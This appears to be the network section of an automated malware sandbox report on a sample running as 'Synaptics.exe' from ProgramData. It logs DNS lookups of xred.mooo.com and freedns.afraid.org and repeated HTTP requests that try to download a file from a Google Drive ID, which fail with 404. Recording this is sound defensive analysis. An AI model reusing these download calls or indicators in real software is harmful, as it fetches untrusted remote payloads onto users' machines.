                                                                                              Jan 2, 2025 20:38:52.933171034 CET44350021142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:52.933212042 CET50021443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:52.933280945 CET50021443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:52.933320999 CET44350021142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:52.933496952 CET44350021142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:52.933545113 CET50021443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:52.933564901 CET50021443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:52.958626032 CET50022443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:52.958669901 CET44350022142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:52.958730936 CET50022443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:52.958980083 CET50022443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:52.958993912 CET44350022142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:53.591867924 CET44350022142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:53.591945887 CET50022443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:53.595084906 CET50022443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:53.595097065 CET44350022142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:53.595442057 CET44350022142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:53.595494986 CET50022443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:53.595765114 CET50022443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:53.639334917 CET44350022142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:54.001878977 CET44350022142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:54.001936913 CET44350022142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:54.002120018 CET50022443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:54.002120972 CET50022443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:54.002185106 CET44350022142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:54.002213955 CET44350022142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:54.002238989 CET50022443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:54.002262115 CET50022443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:54.031074047 CET50022443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:54.031109095 CET44350022142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:54.036359072 CET50024443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:54.036412001 CET44350024142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:54.036482096 CET50024443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:54.036675930 CET50024443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:54.036693096 CET44350024142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:54.677253008 CET44350024142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:54.677397013 CET50024443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:54.677906990 CET44350024142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:54.677969933 CET50024443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:54.679697990 CET50024443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:54.679708958 CET44350024142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:54.679924011 CET44350024142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:54.679975986 CET50024443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:54.680365086 CET50024443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:54.727343082 CET44350024142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:55.065007925 CET44350024142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:55.065099001 CET50024443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:55.065125942 CET44350024142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:55.065180063 CET50024443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:55.065267086 CET50024443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:55.065300941 CET44350024142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:55.065351009 CET50024443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:55.118268013 CET50025443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:55.118304014 CET44350025142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:55.118371010 CET50025443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:55.118613005 CET50025443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:55.118623018 CET44350025142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:55.770210028 CET44350025142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:55.770292044 CET50025443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:55.770716906 CET50025443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:55.770728111 CET44350025142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:55.770909071 CET50025443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:55.770912886 CET44350025142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.268788099 CET44350025142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.268841982 CET44350025142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.268897057 CET50025443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:56.268922091 CET44350025142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.268935919 CET50025443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:56.268970966 CET50025443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:56.268975973 CET44350025142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.268984079 CET44350025142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.269020081 CET50025443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:56.269704103 CET50025443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:56.269716978 CET44350025142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.313522100 CET50027443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:56.313558102 CET44350027142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.313631058 CET50027443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:56.313888073 CET50027443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:56.313901901 CET44350027142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.951216936 CET44350027142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.951384068 CET50027443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:56.951872110 CET44350027142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.951932907 CET50027443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:56.953629971 CET50027443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:56.953643084 CET44350027142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.953849077 CET44350027142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:56.953901052 CET50027443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:56.954279900 CET50027443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:56.999327898 CET44350027142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:57.342274904 CET44350027142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:57.342343092 CET50027443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:57.342431068 CET50027443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:57.342468023 CET44350027142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:57.342525959 CET50027443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:57.380855083 CET50029443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:57.380887032 CET44350029142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:57.380959988 CET50029443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:57.381176949 CET50029443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:57.381186962 CET44350029142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:58.055962086 CET44350029142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:58.056024075 CET50029443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:58.056499958 CET50029443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:58.056504965 CET44350029142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:58.056780100 CET50029443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:58.056783915 CET44350029142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:58.502979994 CET44350029142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:58.503035069 CET44350029142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:58.503088951 CET50029443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:58.503099918 CET44350029142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:58.503142118 CET50029443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:58.503144979 CET44350029142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:58.503180027 CET44350029142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:38:58.503220081 CET50029443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:58.503748894 CET50029443192.168.2.5142.250.185.97
                                                                                              Jan 2, 2025 20:38:58.503762007 CET44350029142.250.185.97192.168.2.5
                                                                                              Jan 2, 2025 20:39:42.948669910 CET4971080192.168.2.569.42.215.252
                                                                                              Jan 2, 2025 20:39:43.260817051 CET4971080192.168.2.569.42.215.252
                                                                                              Jan 2, 2025 20:39:43.870245934 CET4971080192.168.2.569.42.215.252
                                                                                              Jan 2, 2025 20:39:45.073311090 CET4971080192.168.2.569.42.215.252
                                                                                              Jan 2, 2025 20:39:47.479609013 CET4971080192.168.2.569.42.215.252
                                                                                              Jan 2, 2025 20:39:52.292053938 CET4971080192.168.2.569.42.215.252
                                                                                              Jan 2, 2025 20:40:01.901452065 CET4971080192.168.2.569.42.215.252

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 2, 2025 20:37:52.918334961 CET6440653192.168.2.51.1.1.1
                                                                                              Jan 2, 2025 20:37:52.925832987 CET53644061.1.1.1192.168.2.5
                                                                                              Jan 2, 2025 20:37:52.946017027 CET6201853192.168.2.51.1.1.1
                                                                                              Jan 2, 2025 20:37:52.953609943 CET53620181.1.1.1192.168.2.5
                                                                                              Jan 2, 2025 20:38:51.881697893 CET5502553192.168.2.51.1.1.1
                                                                                              Jan 2, 2025 20:38:51.888566971 CET53550251.1.1.1192.168.2.5
                                                                                              Jan 2, 2025 20:38:52.949984074 CET5413953192.168.2.51.1.1.1
                                                                                              Jan 2, 2025 20:38:52.957950115 CET53541391.1.1.1192.168.2.5

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Jan 2, 2025 20:37:52.918334961 CET192.168.2.51.1.1.10xdea5Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:37:52.946017027 CET192.168.2.51.1.1.10x8bbdStandard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:38:51.881697893 CET192.168.2.51.1.1.10x892fStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:38:52.949984074 CET192.168.2.51.1.1.10x721dStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Jan 2, 2025 20:37:52.925832987 CET1.1.1.1192.168.2.50xdea5Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:37:52.953609943 CET1.1.1.1192.168.2.50x8bbdNo error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:38:02.487092972 CET1.1.1.1192.168.2.50x76e9No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Jan 2, 2025 20:38:02.487092972 CET1.1.1.1192.168.2.50x76e9No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:38:15.659782887 CET1.1.1.1192.168.2.50x7a8eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Jan 2, 2025 20:38:15.659782887 CET1.1.1.1192.168.2.50x7a8eNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:38:51.888566971 CET1.1.1.1192.168.2.50x892fNo error (0)docs.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:38:52.957950115 CET1.1.1.1192.168.2.50x721dNo error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:38:55.810477018 CET1.1.1.1192.168.2.50x73b4No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Jan 2, 2025 20:38:55.810477018 CET1.1.1.1192.168.2.50x73b4No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • docs.google.com
                                                                                              • drive.usercontent.google.com
                                                                                              • freedns.afraid.org

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.54971069.42.215.252807364C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Jan 2, 2025 20:37:52.967511892 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                              User-Agent: MyApp
                                                                                              Host: freedns.afraid.org
                                                                                              Cache-Control: no-cache
                                                                                              Jan 2, 2025 20:37:53.589658022 CET243INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 02 Jan 2025 19:37:53 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              X-Cache: MISS
                                                                                              Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 1fERROR: Could not authenticate.0


                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.550021142.250.184.2384437364C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:38:52 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:38:52 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:38:52 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-M9F3MQIymM5KvfBJZaC-CA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.550022142.250.185.974437364C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:38:53 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2025-01-02 19:38:53 UTC1601INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC5J2wcYuTkX-xkQT8FSKqGHktGrzCtpgjVhmKpHsBNkyL4wZjkxiFYFAAAXhYAcuOMjHRMwmuI
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:38:53 GMT
                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-6t4U7rP3YozBkUnFONUWRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Set-Cookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I; expires=Fri, 04-Jul-2025 19:38:53 GMT; path=/; domain=.google.com; HttpOnly
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:38:53 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 4a 71 6f 38 6f 52 79 65 53 54 62 46 53 65 4c 47 74 51 74 70 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7Jqo8oRyeSTbFSeLGtQtpg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                              2025-01-02 19:38:53 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.550024142.250.184.2384437364C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:38:54 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
                                                                                              2025-01-02 19:38:55 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:38:54 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Os7Hnvnya8oo3bkEnMJeWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.550025142.250.185.974437364C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:38:55 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
                                                                                              2025-01-02 19:38:56 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6A28wtMAypMUfN65dy_3-vAh4CsIODc516Ohuug12TEwPqshOxGb5qediKdLFaray1
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:38:56 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-NYOikIDt8jRF7wIiCKzr-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:38:56 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
